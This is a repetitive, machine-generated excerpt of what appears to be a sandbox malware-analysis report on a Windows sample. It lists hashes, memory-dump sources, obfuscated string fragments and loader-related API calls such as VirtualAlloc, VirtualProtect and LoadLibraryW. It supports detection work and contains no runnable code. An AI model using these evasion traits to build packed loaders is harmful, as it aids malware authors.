                                • Opcode ID: 8c9544f18fb1405399ccadd22fe28842a1bc6f611cdff5d8b8e79ec41441f148
                                • Instruction ID: 5423523a47fa3e50a9e9bde5b13aecf503817ebbe0d84aa13055033b614c3309
                                • Opcode Fuzzy Hash: 8c9544f18fb1405399ccadd22fe28842a1bc6f611cdff5d8b8e79ec41441f148
                                • Instruction Fuzzy Hash: 89F119B1D092A48AE7208764DC587EABFB5AF91310F0440FAC44D67281D67E5FD6CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$Q$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-1625077675
                                • Opcode ID: 7f1b33414e2a7791d3d800da4392e6b715e5d862f5480093d9c0330ca0bba250
                                • Instruction ID: 047c1a53214b774ccd5f0dc55c26d04468d234c399aa2b1b25797c2473daef5e
                                • Opcode Fuzzy Hash: 7f1b33414e2a7791d3d800da4392e6b715e5d862f5480093d9c0330ca0bba250
                                • Instruction Fuzzy Hash: DFE119B1D092A48AE7208764DC187EABFB5AF91310F0441FAC48D67681D67E4FD5CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                • Opcode ID: c79cec867c89a9c2a28cdd1acf59e103ce9dc7b7538d34d528461ed01ed3e7e3
                                • Instruction ID: 0e0e23d670f01d3500df2a0f3c1637fa78a805c859d8d0aa73865cbc9e2feab3
                                • Opcode Fuzzy Hash: c79cec867c89a9c2a28cdd1acf59e103ce9dc7b7538d34d528461ed01ed3e7e3
                                • Instruction Fuzzy Hash: 04E13AB1D092A48AE7208764DC58BEA7FB5AF91310F0441FAC84D67281D67E4FD5CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                • Opcode ID: 57c12ce5f3dda49e19c7de8a25667848688963a211dcf80c906533ae7ee2d5fe
                                • Instruction ID: 4639fc3d27c4c8c1971e834b8518429425903c79d60c0106529cfbf85fc9f3e8
                                • Opcode Fuzzy Hash: 57c12ce5f3dda49e19c7de8a25667848688963a211dcf80c906533ae7ee2d5fe
                                • Instruction Fuzzy Hash: 88E119B1D092A48AE7208764DC587EABFB5AF91310F0441FAC84D67281D67E4FD5CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                • Opcode ID: bc71020153b4cc03191988b72ad6a6e48db4408f430abbc68f194394c01f58be
                                • Instruction ID: 01d1e79294988f08435f6c0245dca90a19addb368255d04eebb25083565b2e0d
                                • Opcode Fuzzy Hash: bc71020153b4cc03191988b72ad6a6e48db4408f430abbc68f194394c01f58be
                                • Instruction Fuzzy Hash: 22E117B1D092A48AE7208764DC587EABFB5AF91310F0441FAC84D67281D67A4FD5CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                • Opcode ID: 562ee0a9e16468c19f621318af301135f1ac1e8067ae1d4847febf4028a94b25
                                • Instruction ID: a78a3b80115a7101d7063a0e83ae7a163adac27f7e1d5f7f425525330b9c9b92
                                • Opcode Fuzzy Hash: 562ee0a9e16468c19f621318af301135f1ac1e8067ae1d4847febf4028a94b25
                                • Instruction Fuzzy Hash: 16E118B1D082A48AE7208764DC487EABFB5AF91310F0441FAC84D67281D67E4FD5CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-4161312708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 544645111-4161312708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 544645111-4161312708
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$L$L$W$W$[P$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 1029625771-1399067253
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$L$L$W$W$[P$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 1029625771-1399067253
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$L$L$W$W$[P$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 1029625771-1399067253
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041D1C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: E$L$L$P$R$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 544645111-1986278618
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: >NN$L$L$L$L$S$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-3879096502
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: E$L$L$P$W$_Q$a$a$b$c$d$e$i$i$j@h$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 0-3027466465
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$L$L$S$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-433306928
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$L$L$S$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-433306928
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$L$L$S$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-433306928
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$L$L$S$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-433306928
                                APIs
                                • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0296F35A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: E$L$L$P$W$_Q$a$a$b$c$d$e$i$i$j@h$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 4275171209-3027466465
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$L$S$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-205709743
                                APIs
                                • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0296F35A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$j@h$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 4275171209-410011414
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$j@h$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 0-410011414
                                APIs
                                • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0296F35A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$j@h$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 4275171209-410011414
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$j@h$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 0-410011414
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: 6:56$=K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-3897388640
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 84F=$P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-1945703278
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 84F=$P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-1945703278
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: GM@$P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-1763701335
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                APIs
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C5D
                                • LoadLibraryW.KERNELBASE(?), ref: 02924C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: =K:3$L$L$W$[P$a$a$b$d$i$o$r$r$y
                                • API String ID: 1029625771-2882651232
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041D1C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: E$P$R$^P$c$e$i$o$r$s$s$t$uAV$x
                                • API String ID: 544645111-1540573093
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041D1C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: E$P$R$^P$c$e$i$o$r$s$s$t$uAV$x
                                • API String ID: 544645111-1540573093
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: F2=:$JMI:$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 544645111-3223098477
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041D1C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: E$P$R$^Q$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-3323660942
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-4069139063
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
